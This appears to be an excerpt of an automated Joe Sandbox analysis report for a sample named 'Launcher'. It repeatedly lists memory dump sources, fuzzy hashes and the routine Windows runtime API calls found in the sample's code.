                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                            • String ID: A2sx$CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                            • API String ID: 4061214504-1911920552
                                                                                                                                                                                                                                                            • Opcode ID: 140992b79f04393d75288a83995c8e28484c2d06afa6e1b3675455d7a4c5761e
                                                                                                                                                                                                                                                            • Instruction ID: 994230ebf31c17f43f1d584c591dc2d84913c51ffccc39336815898b4ee187b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 140992b79f04393d75288a83995c8e28484c2d06afa6e1b3675455d7a4c5761e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD01D671A58619AFDB018F50DC09FBEBBBCFB44B15F004525F815A23E0DB78A900DB91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009D47C1
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 009D47CF
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 009D47E0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                            • Opcode ID: 395abbbcc45e269ec8bf1ed91a86c9e0e213cc14849fbe717a60957e1df9fe5c
                                                                                                                                                                                                                                                            • Instruction ID: f255ae33496b7120f062a8be4487d236f778f9f51d52ac7b22bc6e3632af6ec0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 395abbbcc45e269ec8bf1ed91a86c9e0e213cc14849fbe717a60957e1df9fe5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02D0A7B153D2146F83005FB0BC4EC7A3BB4EA4435A3010051F904D21B0EB780400DB56
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 59d593948d75ba02a8a1a71e2927181898ca85dcc10bf26614505bfe76ae090d
                                                                                                                                                                                                                                                            • Instruction ID: 5ed86784893f316a45eb20c0f8cecb21647d00cb71e3395fdc8a77c47de2102f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59d593948d75ba02a8a1a71e2927181898ca85dcc10bf26614505bfe76ae090d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAB1F5B0A0828ABFDF16DF9AC881BBD7BB5BF8A314F144159E5149B392C7709D41CB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(78733241,00000000,00000000,?), ref: 009E83C9
                                                                                                                                                                                                                                                              • Part of subcall function 009E05D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,009E1D78,?,00000000,-00000008), ref: 009E0632
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009E861B
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009E8661
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009E8704
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 2112829910-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: e438c8ba9ceea725b7e7c3302a32a5475355fd990cc68a11aeacb38d2a84959f
                                                                                                                                                                                                                                                            • Instruction ID: 56eb2e51c2916a77f99e21d0b1968fa7f9aedb76311a3e19defe0343c19d222c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e438c8ba9ceea725b7e7c3302a32a5475355fd990cc68a11aeacb38d2a84959f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4D15B75D04289DFCF16CFE9C884AAEBBB9EF48314F24456AE419EB351DA30AD41CB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009DF2A3,009D4E61,009D41CC), ref: 009DF2BA
                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009DF2C8
                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009DF2E1
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,009DF2A3,009D4E61,009D41CC), ref: 009DF333
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                            • Opcode ID: 0b3c394e23c2d92a4f25edb3dd278930b3fe912802d4b7410d8ef0c630770b8d
                                                                                                                                                                                                                                                            • Instruction ID: 58c7d204ca0c8d6b5f62a076173129345fbe15534d0f628bef1f6473ec3fa023
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b3c394e23c2d92a4f25edb3dd278930b3fe912802d4b7410d8ef0c630770b8d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F801B13229E3515EEA1526B9BC96A6B6A89DB413B4720833BF921852F1EB514C01F240
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 009DFC43
                                                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 009DFEBC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                            • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                            • Opcode ID: 61615040151c9eeea73d8d207d25746b04a6e884c0a3f28e287d3e462139348b
                                                                                                                                                                                                                                                            • Instruction ID: cf5297090103785ef507d6c113bf71d34a3e37234e72eff6a5859ce7ecdad724
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61615040151c9eeea73d8d207d25746b04a6e884c0a3f28e287d3e462139348b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19B18331880209DFCF14DFA4C892AAEB7B9FF54310F14856BE8166B356D335DA51CBA1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 009D1853
                                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 009D185E
                                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009D18CC
                                                                                                                                                                                                                                                              • Part of subcall function 009D1755: std::locale::_Locimp::_Locimp.LIBCPMT ref: 009D176D
                                                                                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 009D1879
                                                                                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 009D188F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                                                                                            • Opcode ID: b4c38cb5699abe7897b10c6661a64b483aa0303699adbf6ba117dd3f9d7f6aaf
                                                                                                                                                                                                                                                            • Instruction ID: 3602b8c4d9ccbb085fb79b89d075a58e2b8ba6c03c8879d2952c6c7bbed3efb1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4c38cb5699abe7897b10c6661a64b483aa0303699adbf6ba117dd3f9d7f6aaf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC012676A44210AFCB06EF60D84167C77B6FFC4350B14800AF8215B3A1DF38AE42EB81
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009E1AF5
                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,-00000008,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,00000083), ref: 009E1B4D
                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009E1B5A
                                                                                                                                                                                                                                                              • Part of subcall function 009E04C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,009D119F,?,?,009C31F2,00001000,?,009C313A), ref: 009E04F3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 2035984020-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: fcf84618d5cf6faa5ec63a8f6c343e46cf1309754cb5d35541893ca96813df96
                                                                                                                                                                                                                                                            • Instruction ID: fd0fd035e15532716d12befc5d47ad2bdff5234058ca4acf7207d7b5db9e79c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcf84618d5cf6faa5ec63a8f6c343e46cf1309754cb5d35541893ca96813df96
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B31CF7290028AABDB229F66DC41EAF7BB9EF84310F094125F905A7251EB34CD50CBA0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009D200A
                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?), ref: 009D202F
                                                                                                                                                                                                                                                              • Part of subcall function 009D4D23: RaiseException.KERNEL32(E06D7363,00000001,00000003,009D3ADE,?,?,?,?,009D3ADE,00001000,009FAE2C,00001000), ref: 009D4D84
                                                                                                                                                                                                                                                              • Part of subcall function 009DD2B9: IsProcessorFeaturePresent.KERNEL32(00000017,009D7E7B,?,?,?,?,00000000), ref: 009DD2D5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                            • String ID: A2sx$csm
                                                                                                                                                                                                                                                            • API String ID: 1924019822-272854930
                                                                                                                                                                                                                                                            • Opcode ID: 18556c51016be113cf24d70d7eddeada703c2f5a71024eb57d6aa894f810b2ec
                                                                                                                                                                                                                                                            • Instruction ID: f740dcfe5edd7564ea106f7238b78e3fc0f0280fa96914180f650c1ed699d650
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18556c51016be113cf24d70d7eddeada703c2f5a71024eb57d6aa894f810b2ec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB215E32D40218ABCF25DF98D985AAEB7B9FF54710F14841BE905AB350D730AE45CB81
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 009E6677
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009E6681
                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009E6688
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastModuleName__dosmaperr
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 4076908705-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 812c13d884be6346aa0605f14370cd3b3d3c6087fd55b99a1c76376872e1c49f
                                                                                                                                                                                                                                                            • Instruction ID: 2b4747e29a7298892658c49c31a33139c835085ced23410c3ee61171f404a638
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 812c13d884be6346aa0605f14370cd3b3d3c6087fd55b99a1c76376872e1c49f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA115B7195425DABCB10DFA5DC89BDEB7B8AF58304F10449AF509E7241EA309A84CF54
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009EAC9D,00000000,?,009FEFA0,?,?,?,009EABD4,00000004,InitializeCriticalSectionEx,009F4F0C,009F4F14), ref: 009EAC0E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,009EAC9D,00000000,?,009FEFA0,?,?,?,009EABD4,00000004,InitializeCriticalSectionEx,009F4F0C,009F4F14,00000000,?,009E016C), ref: 009EAC18
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009EAC40
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                            • Opcode ID: 8f487b0facbb7b7cb61fe225c4fa8b1a7f5263830368d4813dab0289e2d7e0ca
                                                                                                                                                                                                                                                            • Instruction ID: a079354415d71452998558fa1f645eba9e5f2df9ff89e1ecbd53e47cb9859795
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f487b0facbb7b7cb61fe225c4fa8b1a7f5263830368d4813dab0289e2d7e0ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0E04F70294248BBEF111F62EC06F693F59AB10B56F244020F94CE80F1D761ED10D64A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                                                            • Opcode ID: 750d46d208c488927feed25b99d22d654afb573b01144273f5180a6ff699df46
